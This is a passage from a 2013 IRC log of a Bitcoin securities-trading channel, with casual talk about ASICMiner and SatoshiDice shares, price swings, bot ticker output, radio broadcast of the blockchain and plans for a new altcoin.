next couple of weeks... but it's possible half of that incoming capital was stopped by the goxfail. maybe they buy in next few weeks? Apr 14 20:50:20 what assets are you feeling? Apr 14 20:50:34 i only like asicminer Apr 14 20:50:54 i'm not sur about the new 150000 account open in mtgox since 2013, if they bought 1btc each :troll: Apr 14 20:51:18 they couldn't verify that many in 3 months if their lives depended on it. Apr 14 20:51:19 I don't understand the Asicminer hype, sure the dividends are high, but it will devaluate very quickly Apr 14 20:51:23 trying to scout some ipo's but jeeez seems like every asset popping up lately is just scammy Apr 14 20:51:27 yeah, it's overpriced. Apr 14 20:51:51 stick with the winners, sdice rallied a bit... where is it now? Apr 14 20:51:59 not that sdice is a winner... lol. Apr 14 20:52:03 sdice is still up Apr 14 20:52:07 going up more too Apr 14 20:52:10 heh yeah i was going to say Apr 14 20:52:34 with ASCM you bought also next gen of asci Apr 14 20:53:06 I thought you only bought shares into that 1 machine Apr 14 20:53:07 have you noticed alot of miners trying to offload their asic preorders lately? Apr 14 20:53:09 do u see this cute usb dongle ? Apr 14 20:53:25 not in the company Apr 14 20:53:34 error4733 i want to order 100 :P Apr 14 20:53:39 same Apr 14 20:53:45 TAKE MY MONEY was my first react Apr 14 20:53:53 with AM you buy Friedcat, arguably the most motivated btc business manager for a public company Apr 14 20:53:54 SHUT UP AND TAKE MY BITCOIN Apr 14 20:54:16 and the only company that doesn't seem to be a complete scam Apr 14 20:54:19 damien : no you bought a part of any hash ASCM put in network Apr 14 20:54:25 which is very refreshing Apr 14 20:54:37 they work already on next gen Apr 14 20:54:54 error might wait on their bigboy instead of usd thingy's Apr 14 20:55:00 keep in mind that if the gloom and doom everyone is predicting happens Apr 14 20:55:07 stock values will skyrocket Apr 14 20:55:27 http://www.youtube.com/watch?v=eE5WQLMwHHk <---- lame but hilarious remake of the annoyed goat/sheep/antelope thing. Apr 14 20:55:45 heh Apr 14 20:55:49 ah, must've misread that somewhere Apr 14 20:55:52 [BTCTC] [ASICMINER-PT] 1 @ 0.8499 BTC [-] Apr 14 20:55:52 anyone selling any via friendcat? Apr 14 20:56:00 not a pt Apr 14 20:56:01 double check, maybe it's me Apr 14 20:56:17 I'm double checking, but can't find that clause anymore Apr 14 20:57:01 b0n1 probably should chat davout up. Apr 14 20:57:06 deadweasel someone needs to do some subs of that german kid raging at his computer Apr 14 20:57:10 ;;tslb Apr 14 20:57:13 Time since last block: 13 minutes and 43 seconds Apr 14 20:57:18 ;;estimate Apr 14 20:57:19 Next difficulty estimate | 8961787.72453 based on data since last change | 8940745.26815 based on data for last three days Apr 14 20:57:21 i haven't seen that one. Apr 14 20:57:40 I must be mistaken, seems like a good deal then Apr 14 20:57:53 http://techcrunch.com/2013/04/09/coinsetter-lands-500k-from-secondmarket-founder-others-to-help-bring-leverage-shorting-to-bitcoin-trade/ Apr 14 20:57:56 coinsetter? Apr 14 20:58:03 wait, i look for a link ;) Apr 14 20:58:05 https://www.youtube.com/watch?v=W2QxLpS3aIM Apr 14 20:58:19 i was raging hard like that at one point Apr 14 20:59:06 i might put something together Apr 14 20:59:10 fire up teh old avid Apr 14 20:59:41 loling hard just thinking about it Apr 14 21:00:27 deadweasel the hype machine. i Apr 14 21:00:39 [BTCTC] [ASICMINER-PT] 1 @ 0.8214 BTC [-] Apr 14 21:00:44 'm waiting foer the day when "the press" goes "everyone who listened to us got fucked for a slice of ~20 mn in the btc market" Apr 14 21:00:54 [BTCTC] [ASICMINER-PT] 1 @ 0.8213 BTC [-] Apr 14 21:00:55 "because that's what we do : we cost you money" Apr 14 21:01:01 [BTCTC] [ASICMINER-PT] 1 @ 0.8212 BTC [-] Apr 14 21:01:04 [BTCTC] [ASICMINER-PT] 3 @ 0.821 = 2.463 BTC [-] Apr 14 21:01:14 hehe, it will come. Apr 14 21:01:27 mircea fox news said you jumped from a window when it hit 50 Apr 14 21:01:34 right. Apr 14 21:01:44 because fox news knows. Apr 14 21:01:46 trying to cause a media panic Apr 14 21:02:01 damientrog :long term: company will ensure profitable operation and moving forward to next gen ASICs. Each share is entitled for 1/400'000 of company lifetime profits. Apr 14 21:02:22 this bets of bitcoin twitter account keeps following me like weekly on twitter. Apr 14 21:02:24 fucking bs. Apr 14 21:02:43 thanks for clearing that up for me error4733 Apr 14 21:03:01 damientrog it's a gamble on the proposition "Everyone else will be more inept than them". Apr 14 21:03:11 it was a good deal at 0.1btc/15$ Apr 14 21:03:15 sure, normally they'd fade. still, it's been 9 months and still no actual asics. Apr 14 21:03:24 besides Avalons Apr 14 21:03:33 no. avalons don't count. Apr 14 21:03:41 [BTCTC] [S.DICE-PT] 1 @ 0.00418 BTC [+] Apr 14 21:03:41 it's a limited volume private run. Apr 14 21:03:42 how so? Apr 14 21:03:46 [BTCTC] [S.DICE-PT] 1 @ 0.00418 BTC [+] Apr 14 21:03:57 "asics" means, we will sell you ANY QTY as long as you pay within 60 days of ordering. Apr 14 21:03:59 0.8btc/250$ calcul is different but still god for what i can read Apr 14 21:04:03 tjhat's what supply means. Apr 14 21:04:15 if i want to buy memory chips I can buy 1mn, 100mn or 1 trn chips. Apr 14 21:04:33 I see your point Apr 14 21:04:55 fact that some guy is making 300 units for his friends./whatever... hardly count in a market sense. Apr 14 21:04:55 then they're indeed the only one Apr 14 21:05:06 well I bought 6 Avalons Apr 14 21:05:13 yea but still. Apr 14 21:05:16 anxiously awaiting them Apr 14 21:05:26 ... fucking lucker :) bash #2 ? Apr 14 21:05:31 #3 Apr 14 21:05:33 heh. Apr 14 21:05:41 sorry for your loss Apr 14 21:05:48 you've not bought anything imo. maybe lottery tickets. Apr 14 21:05:56 I know Apr 14 21:06:19 it's not my only investment Apr 14 21:06:32 a, yea. not impugning uyou, just sdayin' Apr 14 21:06:32 whole BTC is one big gamble Apr 14 21:06:39 from a macro perspective exactly. Apr 14 21:06:46 avalon show before they have the gift for every ticket #1 Apr 14 21:06:49 [BTCTC] [BTC-BOND] 3 @ 0.01 = 0.03 BTC [+] Apr 14 21:06:54 yes Apr 14 21:07:19 that my point 2 week ago, asking myself if i want sold some btc Apr 14 21:07:28 every btc is a lotery ticket Apr 14 21:07:45 nobody know how much you can win with Apr 14 21:08:16 I've cashed out more than I invested + have more BTC than before, so it's all fun and games for me Apr 14 21:08:35 but I don't think many people are in that situation Apr 14 21:09:14 10%, the average for sup IQ Apr 14 21:09:30 FML :/ Apr 14 21:10:59 if you do get it error4733 you could sell for btc when btc is at 30 (probably when it arrives at your door). Apr 14 21:13:07 @ericschmidt For every person online, there are two who are not. By the end of the decade, everyone on Earth will be connected. #NewDigitalAge Apr 14 21:13:16 Neither AValon nor BFL, to late for me... Apr 14 21:13:20 Mircea_Popescu @ericschmidt For every softie that thinks "every person counts" there's ten hardies that disagree. #NewWorldWar Apr 14 21:13:28 curious what he says to that heh. Apr 14 21:19:01 [MPEX] [S.MPOE] 16605 @ 0.00068596 = 11.3904 BTC [-] Apr 14 21:19:03 [MPEX] [S.MPOE] 2651 @ 0.00068593 = 1.8184 BTC [-] Apr 14 21:36:12 [BTCTC] [BTC-BOND] 200 @ 0.01 = 2 BTC [+] Apr 14 21:38:38 "made from pickled herring" ? Apr 14 21:39:02 hi Apr 14 21:39:13 hello Apr 14 21:39:47 how are you ? Apr 14 21:39:54 hi. lol, does not taste like herring Apr 14 21:40:16 really yummy Apr 14 21:40:19 [BTCTC] [BTC-BOND] 61 @ 0.01 = 0.61 BTC [+] Apr 14 21:40:21 Can I ask in here ? Apr 14 21:40:42 unkown247, it depends. just try to ask. Apr 14 21:40:48 hey guys, I'm doing a regression analysis on bitcoin for an econ class, I'm wondering if anyone can point in the right direction for data Apr 14 21:40:51 jurov http://www.youtube.com/watch?v=c-WO73Dh7rY Apr 14 21:40:54 for the inside of that joke Apr 14 21:40:56 how to buy bitcoin Apr 14 21:40:58 ? Apr 14 21:41:23 unkown247 this is the #bitcoin-assets chan. we're stock brokers etc here. Apr 14 21:41:28 try #bitcoin-otc for that. Apr 14 21:41:38 ok Apr 14 21:41:54 do u mean that u buy and u sell bitcoin ? Apr 14 21:41:57 exfortuna tried bitcoincharts ? Apr 14 21:42:11 unkown247 no. bitcoin-denominated securities such as shares, options etc. Apr 14 21:42:30 ok I got it Apr 14 21:42:38 thanks Apr 14 21:42:48 http://bitcoincharts.com/about/markets-api/ Apr 14 21:45:03 sry, i never get any inside jokes related to unsubtitled comedy Apr 14 21:45:26 and youtube "automatic subtitles" are a joke Apr 14 21:45:57 negative, I'll google that now thanks Apr 14 21:46:09 heh stock brokers Apr 14 21:46:32 ;;seen smickles Apr 14 21:46:32 smickles was last seen in #bitcoin-assets 1 week, 3 days, 3 hours, 4 minutes, and 0 seconds ago: a bitcoin atm could be the easiest way to send money to a friend, each of you just goes to an atm Apr 14 21:46:34 bit brokers? Apr 14 21:46:42 seems the attrition rate is really high Apr 14 21:49:20 [BTCTC] [ASICMINER-PT] 1 @ 0.849 BTC [+] Apr 14 21:50:24 jurov ok let's see if this exists Apr 14 21:52:00 [HAVELOCK] [SDICE] 1 @ 0.40789998 BTC [+] Apr 14 21:52:02 [HAVELOCK] [SDICE] 4 @ 0.40789999 = 1.6316 BTC [+] Apr 14 21:52:52 [BTCTC] [BASIC-MINING] 1 @ 0.41 BTC [+] Apr 14 21:53:01 [HAVELOCK] [SDICE] 1 @ 0.40789999 BTC [+] Apr 14 21:53:10 [BTCTC] [ASICMINER-PT] 3 @ 0.8499 = 2.5497 BTC [+] Apr 14 21:53:14 [BTCTC] [ASICMINER-PT] 2 @ 0.85 = 1.7 BTC [+] Apr 14 21:54:51 [BTCTC] [S.DICE-PT] 1 @ 0.00419 BTC [+] Apr 14 21:56:16 [BTCTC] [BASIC-MINING] 1 @ 0.41 BTC [+] Apr 14 21:56:37 jurov seems it doesn't exist. pity. Apr 14 21:57:49 [BTCTC] [S.DICE-PT] 29 @ 0.00419 = 0.1215 BTC [+] Apr 14 21:57:52 [BTCTC] [S.DICE-PT] 10 @ 0.00449 = 0.0449 BTC [+] Apr 14 21:57:57 [BTCTC] [S.DICE-PT] 12 @ 0.004499 = 0.054 BTC [+] Apr 14 21:58:13 *shrug* *smile* Apr 14 21:59:00 wish some new asset exchanges would pop up Apr 14 21:59:39 what's havelock like? Apr 14 22:00:22 lol over 100k google translate requests for trilema this month. Apr 14 22:00:29 i hope the readers are enjoying gt's humour Apr 14 22:01:41 [BTCTC] [S.DICE-PT] 6 @ 0.0045 = 0.027 BTC [+] Apr 14 22:11:31 mircea_popescu how have you been? Apr 14 22:11:39 not bad. Apr 14 22:14:56 what's your expectation in the coming months? slow leak to $30 mimicking 2011 post bubble plateau? or do we go up again immediately? Apr 14 22:15:08 http://polimedia.us/dtng/c/src/128227433695.jpg wouldn't it kick ass if that was Bitcoin branded ? Apr 14 22:15:17 deadweasel 100 to 130. Apr 14 22:15:25 those are great tits. Apr 14 22:15:33 but i bet she gives terrible head Apr 14 22:15:57 you think we've stopped here for the moment then? Apr 14 22:16:20 kinda. Apr 14 22:17:13 never can tell. i hope it calms the fuck down for a while. Apr 14 22:17:19 mc you are mpoe-pr right? Apr 14 22:17:26 mp* Apr 14 22:17:35 why do you pretend to be a girl Apr 14 22:18:03 lol seems the btctalk trolling has deep roots Apr 14 22:18:17 insulating himself probably. i would. plus tits go a long way in the forum. Apr 14 22:18:25 why it is so unbelievable for mp to have female assistant? Apr 14 22:18:33 haha Apr 14 22:18:56 taub nope. Apr 14 22:18:57 http://polimedia.us/dtng/c/src/128227433695.jpg , that's her, he's about to brand her lip plate with a CC. Apr 14 22:19:35 jurov possibly because nobody on the interwebs knows any girls ? Apr 14 22:19:53 mircea_popescu question about bitbet, would you guys allow for franchising? Apr 14 22:20:07 like github Apr 14 22:20:08 ;;next Apr 14 22:20:09 awaiting breakout: http://bit.ly/Ynx3uT | targets: 106, 113, 124, 130 on the upside | support: 100, 98, 92, 87-88 | resistance: 102.5, 105, 110 | lowball buy target: 74-75 | strong rally sell target: 138-148 | updated by OneFixt ( tips: http://bit.ly/YnxUM4 ) | trade at your own risk, this is not investment or trading advice | 19 hours, 20 minutes, and 9 seconds Apr 14 22:20:15 why dont you post yoruself on btctalk? Apr 14 22:20:24 thestringpuller specifically ? Apr 14 22:20:47 taub i don't have the time/patience/interest. Apr 14 22:21:13 FabianB_: lol who's giving that analysis Apr 14 22:21:13 taub, i'd avoid dealing with btctalk personally too, if i could Apr 14 22:21:17 all those lines, seem a bit overkill Apr 14 22:21:29 taub: OneFixt Apr 14 22:21:43 taub: hah yes they are, sorry, had some old lines on there; watching the yellow trinagle Apr 14 22:21:46 triangle Apr 14 22:22:17 i tried a little long from 100 to 104 and 107, but price wouldnt take off so i exited b/e Apr 14 22:22:31 no point in trying to trade when price doesnt move Apr 14 22:22:36 same, exited in the 100s, bought in under 100, then we consolidated Apr 14 22:24:16 [BTCTC] [CRYPTO-TRADE] 25 @ 0.2 = 5 BTC [+] Apr 14 22:24:39 I want to run a bookie service for my town, local bets and shit. Apr 14 22:24:52 I could make a bitbet bet but then it really has no point Apr 14 22:25:18 bribe kakobrekla to make you branded copy of bitbet Apr 14 22:25:31 1 bn bitcoins enough for you :P Apr 14 22:26:03 srsly, you're making me an offer? Apr 14 22:26:13 thestringpuller i still don't ghet it. Apr 14 22:26:16 =) Apr 14 22:26:22 so you put your own bets, promote them among friends or w/e Apr 14 22:26:29 how's this different from everyone else using bitbet ? Apr 14 22:26:31 what's not to allow ? Apr 14 22:27:59 Uh you have to approve the bets, and you'll be like "wtf is this bet about who can chug hot sauce and not die" Apr 14 22:28:07 zeroconf it. Apr 14 22:28:19 zeroconf? Apr 14 22:28:29 send a bet along with your bet. Apr 14 22:28:58 I didn't expect you to be so reasonable :P Apr 14 22:29:14 lol Apr 14 22:29:31 but seriously, you get a little "send a bet" option as you make a new proposition. Apr 14 22:29:37 if you send nothing mods are meh, random shit. Apr 14 22:29:55 if you send sometyhing you're more likely to get "a, somebody wants this, ok". Apr 14 22:29:58 sounds reasonable, i didn't know if you were opposed to people setting up rackets using bitbet Apr 14 22:30:15 bets with nothing on have to be judged as cool enough. bets with a decent something on just have not to suck, different standard. Apr 14 22:30:36 well thestringpuller, more generally, everything i do is to help people start their own rackets. Apr 14 22:30:43 sometimes even against their will. Apr 14 22:30:47 ... Apr 14 22:31:01 also, shoes : http://polimedia.us/dtng/c/src/131722396096.jpg Apr 14 22:43:01 ;;seen smickles Apr 14 22:43:02 smickles was last seen in #bitcoin-assets 1 week, 3 days, 4 hours, and 29 seconds ago: a bitcoin atm could be the easiest way to send money to a friend, each of you just goes to an atm Apr 14 22:43:30 ;;whatis next Apr 14 22:43:30 Error: No factoid matches that key. Apr 14 22:44:31 thestringpuller, i remember that comics where a dog sitting before door is drawn "intently staring at the door makes the master manifest" Apr 14 22:45:49 So Fry's dog from Futurama? Not so much. smickles is too busy playing kerbal space program and submitting taxes for probably 4mn people in btc due to tax day being tomorrow Apr 14 22:47:22 ;eightball will this week be epic ? Apr 14 22:47:36 ;;eightball will this week be epic ? Apr 14 22:47:36 Obviously. Apr 14 22:47:45 ;;eightball will smickles be back after tax day? Apr 14 22:47:46 It shall be. Apr 14 22:47:57 I'm holding you to that eight ball :P Apr 14 22:50:41 ;;eightball tank please Apr 14 22:50:41 Maybe... Apr 14 22:54:45 how much of a shoot up we looking at? Apr 14 22:54:47 108? Apr 14 22:55:54 cmon touch on 95, get away from it genbtc Apr 14 22:57:18 ;;ticker Apr 14 22:57:19 BTCUSD ticker | Best bid: 94.99000, Best ask: 95.00000, Bid-ask spread: 0.01000, Last trade: 95.00000, 24 hour volume: 164410.66775422, 24 hour low: 85.50000, 24 hour high: 109.99800, 24 hour vwap: 98.95551 Apr 14 22:58:00 http://www.firstnationalib.com/contact Apr 14 22:58:04 those pics Apr 14 22:58:06 looks legit! Apr 14 22:59:27 http://polimedia.us/dtng/c/thumb/133180234433s.jpg lol Apr 14 23:01:52 whos posting on that imageboard... D: Apr 14 23:01:57 is it just you? Apr 14 23:05:55 i pretty much never do Apr 14 23:10:09 ;;ticker Apr 14 23:10:09 BTCUSD ticker | Best bid: 94.47845, Best ask: 95.00000, Bid-ask spread: 0.52155, Last trade: 95.00000, 24 hour volume: 167103.13362195, 24 hour low: 85.50000, 24 hour high: 109.99800, 24 hour vwap: 98.87456 Apr 14 23:10:11 ;;bids 90 Apr 14 23:10:13 There are currently 4955.5944 bitcoins demanded at or over 90.0 USD, worth 450788.933529 USD in total. | Data vintage: 0.0037 seconds Apr 14 23:10:20 ;;asks 100 Apr 14 23:10:20 There are currently 1289.1968 bitcoins offered at or under 100.0 USD, worth 126526.009402 USD in total. | Data vintage: 7.3216 seconds Apr 14 23:15:27 ;;ticker --last Apr 14 23:15:28 92.02000 Apr 14 23:20:24 ;;ticker Apr 14 23:20:25 BTCUSD ticker | Best bid: 95.40000, Best ask: 95.99999, Bid-ask spread: 0.59999, Last trade: 96.00000, 24 hour volume: 169521.80213052, 24 hour low: 85.50000, 24 hour high: 109.99800, 24 hour vwap: 98.79745 Apr 14 23:24:14 ;;goxlag Apr 14 23:24:16 MtGox lag is 1.046827 seconds. During this time, light travels 0.00209782958714 AU. You could have sent a bitcoin across the outer diameter of Saturn's rings (0.0024 AU). Apr 14 23:25:53 ;;ticker Apr 14 23:25:54 BTCUSD ticker | Best bid: 92.90001, Best ask: 92.95570, Bid-ask spread: 0.05569, Last trade: 92.95570, 24 hour volume: 169543.27943456, 24 hour low: 85.50000, 24 hour high: 109.99800, 24 hour vwap: 98.78371 Apr 14 23:26:49 ;;ticker Apr 14 23:26:50 BTCUSD ticker | Best bid: 93.00000, Best ask: 93.35000, Bid-ask spread: 0.35000, Last trade: 93.35000, 24 hour volume: 170955.66962554, 24 hour low: 85.50000, 24 hour high: 109.99800, 24 hour vwap: 98.73499 Apr 14 23:35:50 nice little rollercoaster ride Apr 14 23:37:51 yep Apr 14 23:37:57 riding it Apr 14 23:38:32 ;;ticker Apr 14 23:38:33 BTCUSD ticker | Best bid: 97.90001, Best ask: 97.95739, Bid-ask spread: 0.05738, Last trade: 97.95740, 24 hour volume: 171620.58709880, 24 hour low: 85.50000, 24 hour high: 109.99800, 24 hour vwap: 98.77419 Apr 14 23:39:52 so much money to be made off this volatility Apr 14 23:39:55 hehe bitpay now doing a ama Apr 14 23:39:56 !asks 149 Apr 14 23:40:08 ;;asks 149 Apr 14 23:40:08 There are currently 53669.837 bitcoins offered at or under 149.0 USD, worth 6531716.9332 USD in total. | Data vintage: 60.9799 seconds Apr 14 23:40:20 ;;bids 51 Apr 14 23:40:20 There are currently 89062.744 bitcoins demanded at or over 51.0 USD, worth 6129957.00662 USD in total. | Data vintage: 72.8990 seconds Apr 14 23:40:45 ;;bids 0 Apr 14 23:40:45 There are currently 43661871 bitcoins demanded at or over 0.0 USD, worth 13751617.8104 USD in total. | Data vintage: 98.0780 seconds Apr 14 23:41:10 ;;ticker Apr 14 23:41:11 BTCUSD ticker | Best bid: 96.60512, Best ask: 96.90000, Bid-ask spread: 0.29488, Last trade: 96.90000, 24 hour volume: 171682.79420653, 24 hour low: 85.50000, 24 hour high: 109.99800, 24 hour vwap: 98.77633 Apr 14 23:44:20 cmooon worthless! Apr 14 23:44:45 lol Apr 14 23:45:18 spoiled brat Apr 14 23:46:25 this volatility is a lil too risky for me, not riding this rollercoaster just yet Apr 14 23:46:46 deploy golden parachute Apr 14 23:46:56 with some fatties in hand Apr 14 23:48:26 ;;next Apr 14 23:48:27 expecting 105 if we break 99 | targets: 105, 113, 124, 130 on the upside | support: 94, 92, 87-88 | resistance: 102.5, 105, 110 | lowball buy target: 74-75 | strong rally sell target: 138-148 | updated by OneFixt at Apr 14 2013, 20:46 UTC ( tips: http://bit.ly/YnxUM4 ) | disclaimer: http://bit.ly/129bYJ6 | this is not investment or trading advice | 2 minutes and 27 seconds ago Apr 14 23:48:32 have you ever traded bitcoin... ON WEED?! Apr 14 23:50:16 i usually consult oracles and ask them to gather every different type of drug out there and make a cocktail and inject it into my eyeballs just before i make a trade so i can read the market better Apr 14 23:51:34 ;;bc,24hprc Apr 14 23:51:35 98.76 Apr 14 23:52:03 c1n0: ahhahahahaha Apr 14 23:52:08 that made me laugh irl Apr 14 23:52:09 thank you Apr 14 23:52:11 I needed that Apr 14 23:52:23 :) Apr 14 23:56:39 [BTCTC] [ASICMINER-PT] 1 @ 0.825 BTC [-] Apr 14 23:56:46 [BTCTC] [ASICMINER-PT] 1 @ 0.821 BTC [-] Apr 14 23:57:37 [BTCTC] [S.DICE-PT] 35 @ 0.0036 = 0.126 BTC [-] Apr 15 00:03:32 c1no can we hear more about the oracles? Apr 15 00:04:15 whether they are those contributing to polimedia.us/dtng Apr 15 00:04:22 or some other kind Apr 15 00:04:54 ;;ud spoiled brat Apr 15 00:04:54 http://www.urbandictionary.com/define.php?term=spoiled%20brat | A kid who wants everything they see... and they cry and scream thir heads off until they get it. Apr 15 00:05:10 ;;ticker Apr 15 00:05:11 BTCUSD ticker | Best bid: 97.50002, Best ask: 97.66999, Bid-ask spread: 0.16997, Last trade: 97.50002, 24 hour volume: 167079.16352366, 24 hour low: 85.50000, 24 hour high: 109.99800, 24 hour vwap: 99.06497 Apr 15 00:05:24 not worthless yet so argument invalid Apr 15 00:05:48 [BTCTC] [S.DICE-PT] 28 @ 0.0045 = 0.126 BTC [+] Apr 15 00:06:23 [BTCTC] [GSDPT] 68 @ 0.00371 = 0.2523 BTC [+] Apr 15 00:09:56 what is this ;;next functionality? Apr 15 00:11:18 ;;next Apr 15 00:11:19 expecting 105 if we break 99 | targets: 105, 113, 124, 130 on the upside | support: 94, 92, 87-88 | resistance: 102.5, 105, 110 | lowball buy target: 74-75 | strong rally sell target: 138-148 | updated by OneFixt at Apr 14 2013, 20:46 UTC ( tips: http://bit.ly/YnxUM4 ) | disclaimer: http://bit.ly/129bYJ6 | this is not investment or trading advice | 25 minutes and 19 seconds ago Apr 15 00:11:32 like eightball, but more elaborate Apr 15 00:11:55 [BTCTC] [BTC-BOND] 158 @ 0.01 = 1.58 BTC [+] Apr 15 00:13:46 [BTCTC] [PAJKA.BOND] 20 @ 0.1 = 2 BTC [-] Apr 15 00:14:09 [BTCTC] [PAJKA.BOND] 1 @ 0.0971 BTC [-] Apr 15 00:14:12 [BTCTC] [PAJKA.BOND] 42 @ 0.097 = 4.074 BTC [-] Apr 15 00:16:36 ;;eightball will we hit 98 Apr 15 00:16:37 No clue. Apr 15 00:16:40 basically nonsense. Apr 15 00:16:41 XD Apr 15 00:16:53 ;;eightball is mircea_popescu getting laid? Apr 15 00:16:53 I doubt it very much. Apr 15 00:17:05 So mircea_popescu you have some splaining to do Apr 15 00:17:22 ;;eightball do i have any explaining to do Apr 15 00:17:22 One would be wise to think so. Apr 15 00:17:26 lmao Apr 15 00:17:33 :D Apr 15 00:17:43 I expect a blog post please. Apr 15 00:17:45 jkjk Apr 15 00:18:51 thestringpuller http://polimedia.us/dtng/c/res/13773.html Apr 15 00:20:37 is that that thing that keeps your penis flacid, but if you get an erection it hurts Apr 15 00:20:48 they made a joke about that in californication Apr 15 00:21:45 ugh, does this thing have a tube that goes inside your dick Apr 15 00:21:53 that could… hurt Apr 15 00:22:29 i think it's designed to Apr 15 00:22:40 bitcoinity added interval high/low on the charts - nice.. Apr 15 00:23:40 [MPEX] [S.MPOE] 10319 @ 0.00068593 = 7.0781 BTC [-] Apr 15 00:23:45 afaik that was always there Apr 15 00:27:22 really, never rendered for me... Apr 15 00:28:05 high: 100.75 low: 92.00 Apr 15 00:28:08 that's what you mean right ? Apr 15 00:28:32 mircea_popescu: possibly relevant to your future "Bitcoin over shortwave" station: http://www.dtic.mil/dtic/tr/fulltext/u2/a207831.pdf Apr 15 00:28:36 no.. shaded red/green enveloping on the line chart... Apr 15 00:29:09 i can't believe people still use pdfs Apr 15 00:29:16 pgp o o Apr 15 00:31:41 asciilifeform ok i don't get this. use meteors how ?! Apr 15 00:31:53 i like it - a bit more intuitive than a candlestick chart... Apr 15 00:32:09 mircea_popescu: http://en.wikipedia.org/wiki/Meteor_burst_communications Apr 15 00:32:37 candlestisks are fun Apr 15 00:32:39 mircea_popescu: like satellite comms, but without having to launch satellites. Apr 15 00:32:41 mircea_popescu: what do you use instead of pdfs? Apr 15 00:32:54 da fuck. ok, that's clever. Apr 15 00:33:07 thestringpuller text. Apr 15 00:34:17 mircea_popescu: one thought: this could even be done for profit. Say, transmit the normal blockchain with a few hours of lag, but those who paid a transaction fee get broadcast in real time. Apr 15 00:34:43 nah. problem with mbc i'm told is that it has very narrow bw Apr 15 00:36:07 mircea_popescu: a few kb/sec. will suffice in the hypothetical Dark Internet-less Future and its transaction volume Apr 15 00:36:37 maybe a kb/sec but most trails don't last a second Apr 15 00:36:54 anyway. why not just make a bunch of normal ham radio stations ? Apr 15 00:37:04 mircea_popescu: I think the quoted bandwidth takes the frequency of usable ion trails into account. Apr 15 00:37:09 there's no real advantage in communicating over geographical gaps. Apr 15 00:38:03 mircea_popescu: without ionosphere bounce (shortwave, <30MHz) or something like MBC you will have a very short usable distance. Apr 15 00:38:13 tookah Apr 15 00:38:20 ppokah oomla doomah! Apr 15 00:38:33 asciilifeform the idea is that if you don't manage to get 10-20-50 mile continuity between statyions Apr 15 00:38:42 it's unlikely for your currency to be useful or recognised anyway. Apr 15 00:38:49 actually, you could just do non-geo sats Apr 15 00:38:54 that repeat the entire chain Apr 15 00:39:05 the roman empire coinage only had much relevance in those places 10 miles or closer to a castrum Apr 15 00:39:14 using commodity equipment Apr 15 00:39:30 Diablo-D3 ya but the idea is that for w/e reason you can't use satellites at all Apr 15 00:39:55 so what, just bouncing it off shortwave using high gain antennas? Apr 15 00:40:00 mircea_popescu: the scenario I envision has BTC playing the role of gold bullion, that is relevant despite only being used in relatively few places. Apr 15 00:40:02 basically Apr 15 00:40:05 well Apr 15 00:40:13 shortwave is probably too high bandwidth for what we want Apr 15 00:40:14 asciilifeform ya but that's fiction. you'd have one chain per pocket. Apr 15 00:40:30 there'd be canadacaoin and mexicocoin etc Apr 15 00:40:35 asciilifeform may get what he wants anyhow Apr 15 00:40:37 the cocoin Apr 15 00:40:39 this is why I want to start my own chain Apr 15 00:40:51 to be the silver to btc's gold Apr 15 00:40:58 you're starting ltc ? Apr 15 00:41:03 lol Apr 15 00:41:04 no, ltc did it wrong Apr 15 00:41:16 it should have never used the bitcoin codebase like it did Apr 15 00:41:21 a scenario where there are multiple blockchains, but automated exchanges connect at least the well-behaved ones, is in some ways equivalent to having one blockchain. Apr 15 00:41:23 they didnt understand the implications of the code, and they fucked it up Apr 15 00:41:29 litecoin is dead, hell, it was never born Apr 15 00:41:33 it went nowhere and did nothing Apr 15 00:41:39 I refer to litecoin using past tense. Apr 15 00:41:57 [MPEX] [S.MPOE] 730 @ 0.00068593 = 0.5007 BTC [-] Apr 15 00:42:02 [MPEX] [S.MPOE] 7449 @ 0.00068551 = 5.1064 BTC [-] Apr 15 00:42:04 [MPEX] [S.MPOE] 6250 @ 0.00068538 = 4.2836 BTC [-] Apr 15 00:42:06 theres all the other 10 chains Apr 15 00:42:06 [MPEX] [S.MPOE] 10000 @ 0.00068351 = 6.8351 BTC [-] Apr 15 00:42:07 [MPEX] [S.MPOE] 8621 @ 0.00068305 = 5.8886 BTC [-] Apr 15 00:42:08 asciilifeform yeah in some ways. but if you can't interconnect then youi can't really have an exchange. Apr 15 00:42:19 kakobrekla: yeah, but they're all based on bitcoin Apr 15 00:42:23 I don't directly want that. Apr 15 00:42:25 is solid coin still around btw ? Apr 15 00:42:30 I want to take the ideas of bitcoin and use new code Apr 15 00:42:31 Diablo-D3: LTC ~= 1.3 USD, as of a few seconds ago. Not exactly gum wrappers yet. Apr 15 00:42:40 well hows this Apr 15 00:42:40 Diablo-D3 if you actually take satoshi's stuff, write A SPEC and then have some implementations Apr 15 00:42:47 i dont think they are based on btc.. not all of them Apr 15 00:42:50 you;ll have some of my attention. Apr 15 00:42:52 mircea_popescu: there will be a spec, yes. Apr 15 00:43:01 i mean some are significantly different and stupider Apr 15 00:43:03 Ill need help writing it from people who write formal specs Apr 15 00:43:05 Diablo-D3: sorry, had the denominations reversed. but still. Apr 15 00:43:20 kakobrekla: they started with the bitcoin codebase, none of them went it from scratch Apr 15 00:43:28 this is true, he has a point there. Apr 15 00:43:49 a full re-doing of satoshi's stuff would be great even if only an exercise. Apr 15 00:43:58 but he is not speaking about that Apr 15 00:44:01 pretend it's 2009 and you just published the paper. nao what. Apr 15 00:44:01 yes I am Apr 15 00:44:06 i thought he was Apr 15 00:44:08 Im saying Im going to do it from scratch Apr 15 00:44:27 theres a lot of interesting ideas I want to try out on making chain transmission faster Apr 15 00:44:42 we have what equates to a giant torrent network Apr 15 00:44:45 why arent we using it as such Apr 15 00:45:05 I also want to make it very fucking difficult for ASICs to win Apr 15 00:45:19 GPUs and FPGAs are already out Apr 15 00:45:24 Diablo-D3: at this point, an alt-chain is guilty until proven innocent of being a clever pre-mining scheme. Apr 15 00:45:25 first you want to run asic then you want to kill asic Apr 15 00:45:28 im not following Apr 15 00:45:31 Diablo-D3 http://polimedia.us/dtng/c/src/133347564549.jpg clit likes your idea. Apr 15 00:45:33 Diablo-D3: and ASICs will always win in the end. Apr 15 00:45:39 asciilifeform: its impossible to premine anyhow Apr 15 00:46:03 if your first block is 0 Apr 15 00:46:13 and hwardwired into the client Apr 15 00:46:20 or rather, your first block's parent is 0 Apr 15 00:46:25 how the fuck do you premine it Apr 15 00:46:35 i will mine diablocoins Apr 15 00:46:42 Diablo-D3: people will always assume that whoever the early miners turn out to be, are in cahoots with whoever proposes the alt-chain. Apr 15 00:46:49 asciilifeform: well, they are. Apr 15 00:46:52 dont call it diablocoin Apr 15 00:46:56 even with bitcoin it was Apr 15 00:46:58 I will mine 